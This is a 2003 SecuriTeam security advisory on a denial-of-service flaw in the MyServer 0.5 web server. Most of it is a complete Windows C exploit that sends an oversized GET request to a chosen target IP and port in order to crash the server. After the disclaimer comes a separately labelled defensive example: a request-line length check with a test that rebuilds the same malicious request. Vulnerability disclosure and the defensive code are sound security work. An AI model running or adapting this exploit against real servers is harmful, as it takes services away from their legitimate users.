[NEWS] MyServer DoS (Long GET request)

From: SecuriTeam (support_at_securiteam.com)
Date: 11/17/03

    To: list@securiteam.com
    Date: 17 Nov 2003 17:12:02 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      MyServer DoS (Long GET request)
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.myserverproject.net/forum/portal.php> MyServer is "a free and
    easy to configure web server" available for both the Windows and UNIX
    platforms. A denial of service vulnerability has been found in the product
    allowing remote attackers to cause the server to no longer respond to
    legitimate users.

    DETAILS

    Exploit:
    /* MyServer 0.5 DoS
       vendor:
       http://myserverweb.sourceforge.net
     
       coded and discovered by:
       badpack3t <badpack3t@security-protocols.com>
       for .:sp research labs:.
       www.security-protocols.com
       11.12.2003
      
       usage:
       sp-myserv <targetip> [targetport] (default is 80)
     */

    #include <winsock2.h>
    #include <stdio.h>
    #include <stdlib.h>   /* exit, atoi */
    #include <string.h>   /* strcpy, strcat, strlen, memcpy */

    #pragma comment(lib, "ws2_32.lib")

    char exploit2[65536];
    int main(int argc, char *argv[])
    {
      WSADATA wsaData;
      WORD wVersionRequested;
      struct hostent *pTarget;
      struct sockaddr_in sock;
      char *target;
      int port,bufsize, count;
      SOCKET mysocket;
      
      strcpy(exploit2, "GET /");

      for (count = 0; count < 455; count ++) // L: 275 H:455
      {
        strcat(exploit2, "A");
      }
      strcat(exploit2, ".html HTTP/1.0\r\n\r\n");

      if (argc < 2)
      {
        printf("MyServer 0.5 DoS by badpack3t\r\n<badpack3t@security-protocols.com>\r\n\r\n");
        printf("Usage:\r\n %s <targetip> [targetport] (default is 80)\r\n\r\n", argv[0]);
        printf("www.security-protocols.com\r\n\r\n");
        exit(1);
      }

      wVersionRequested = MAKEWORD(1, 1);
      if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1; /* WSAStartup returns 0 on success */

      target = argv[1];
      port = 80;

      if (argc >= 3) port = atoi(argv[2]);
      bufsize = 1024;
      if (argc >= 4) bufsize = atoi(argv[3]);

      mysocket = socket(AF_INET, SOCK_STREAM, 0);
      if(mysocket==INVALID_SOCKET)
      {
        printf("Socket error!\r\n");
        exit(1);
      }

      printf("Resolving Hostnames...\n");
      if ((pTarget = gethostbyname(target)) == NULL)
      {
        printf("Resolve of %s failed\n", argv[1]);
        exit(1);
      }

      memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
      sock.sin_family = AF_INET;
      sock.sin_port = htons((USHORT)port);

      printf("Connecting...\n");
      if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
      {
        printf("Couldn't connect to host.\n");
        exit(1);
      }

      printf("Connected!...\n");
      printf("Sending Payload...\n");
      if (send(mysocket, exploit2, strlen(exploit2), 0) == -1)
      {
        printf("Error Sending the Exploit Payload\r\n");
        closesocket(mysocket);
        exit(1);
      }

      printf("Remote Webserver has been DoS'ed \r\n");
      closesocket(mysocket);
      WSACleanup();
      return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:badpack3t@security-protocols.com> badpack3t.


    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
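A server-side length check that rejects the request line the PoC above builds, given here as an added example; it is not MyServer's code and not part of the advisory, which does not state the root cause. The function name `check_request_line` and the limits `MAX_TARGET_LEN` and `MAX_LINE_LEN` are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_TARGET_LEN 255  /* assumed policy limit, not a MyServer setting */
#define MAX_LINE_LEN   512  /* assumed cap on the whole request line */

/* Validates "METHOD SP target SP version" in a length-delimited buffer.
   Returns 0 if accepted (target_out/target_len set), 400 if the line is
   malformed or incomplete, 414 if the line or target exceeds the limits. */
int check_request_line(const char *buf, size_t len,
                       const char **target_out, size_t *target_len)
{
    /* Search for end of line only inside received bytes, capped at the limit. */
    size_t scan = len < MAX_LINE_LEN ? len : MAX_LINE_LEN;
    const char *eol = memchr(buf, '\n', scan);
    if (eol == NULL)
        return len >= MAX_LINE_LEN ? 414 : 400;
    size_t line_len = (size_t)(eol - buf);
    if (line_len > 0 && buf[line_len - 1] == '\r')
        line_len--;

    const char *sp1 = memchr(buf, ' ', line_len);       /* end of method */
    if (sp1 == NULL || sp1 == buf)
        return 400;
    const char *tgt = sp1 + 1;
    size_t rest = line_len - (size_t)(tgt - buf);
    const char *sp2 = memchr(tgt, ' ', rest);           /* end of target */
    if (sp2 == NULL || sp2 == tgt || tgt[0] != '/')
        return 400;
    size_t tlen = (size_t)(sp2 - tgt);
    if (tlen > MAX_TARGET_LEN)   /* reject before any copy into a fixed buffer */
        return 414;
    *target_out = tgt;
    *target_len = tlen;
    return 0;
}

int main(void)
{
    /* Constructed sample: a request line shaped like the one the PoC sends. */
    char req[512] = "GET /";
    const char *t; size_t n;
    memset(req + 5, 'A', 455);
    strcpy(req + 460, ".html HTTP/1.0\r\n\r\n");
    printf("status: %d\n", check_request_line(req, strlen(req), &t, &n));
    return 0;
}
```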

